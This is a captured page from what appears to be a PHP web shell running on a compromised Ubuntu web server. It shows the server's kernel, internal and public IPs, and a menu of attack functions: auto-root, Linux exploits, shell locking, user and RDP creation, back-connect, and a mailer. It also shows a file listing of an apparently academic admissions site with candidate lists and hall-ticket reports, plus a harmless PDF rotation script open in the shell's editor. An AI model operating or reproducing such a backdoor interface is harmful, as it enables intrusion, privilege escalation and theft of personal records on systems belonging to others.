Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.17.76.163
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
suk /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
16
B
-rwxr-xr-x
Thumbs.db
19
KB
-rwxr-xr-x
applicationFormReportNEFT.php
16.47
KB
-rwxr-xr-x
applicationFormReportNETBANKIN...
6.31
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
21.29
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
19.74
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
19.36
KB
-rwxr-xr-x
applicationFormReportSBM.php
21.86
KB
-rwxr-xr-x
candidate1_list.php
60.21
KB
-rwxr-xr-x
candidate_list.php
77.69
KB
-rwxr-xr-x
candidate_list2.php
50.42
KB
-rwxr-xr-x
candidate_list20102016.php
55.4
KB
-rwxr-xr-x
candidate_list22.php
64.35
KB
-rwxr-xr-x
candidate_list3.php
60.21
KB
-rwxr-xr-x
candidate_list_kswu.php
59.78
KB
-rwxr-xr-x
candidate_list_kus.php
56.47
KB
-rwxr-xr-x
cappcontext.php
3.19
KB
-rwxr-xr-x
cappdu.php
3.53
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
code39old.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
516
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.34
KB
-rwxr-xr-x
download_upload.html
2.6
KB
-rwxr-xr-x
ean13.php
2.83
KB
-rwxr-xr-x
getnumword.php
7.59
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
mregistry.php
2.28
KB
-rwxr-xr-x
report_admission_ticket.php
16.19
KB
-rwxr-xr-x
report_admission_ticket0112201...
15.88
KB
-rwxr-xr-x
report_hall_ticket.php
11.31
KB
-rwxr-xr-x
revaluation.php
17.12
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
rotationold.php
596
B
-rwxr-xr-x
stringspliter.php
693
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rotation.php
<?php require('code39.php'); class PDF_Rotate extends PDF_Code39 { var $angle=0; function Rotate($angle,$x=-1,$y=-1) { if($x==-1) $x=$this->x; if($y==-1) $y=$this->y; if($this->angle!=0) $this->_out('Q'); $this->angle=$angle; if($angle!=0) { $angle*=M_PI/180; $c=cos($angle); $s=sin($angle); $cx=$x*$this->k; $cy=($this->h-$y)*$this->k; $this->_out(sprintf('q %.5F %.5F %.5F %.5F %.2F %.2F cm 1 0 0 1 %.2F %.2F cm',$c,$s,-$s,$c,$cx,$cy,-$cx,-$cy)); } } function _endpage() { if($this->angle!=0) { $this->angle=0; $this->_out('Q'); } parent::_endpage(); } } ?>
Close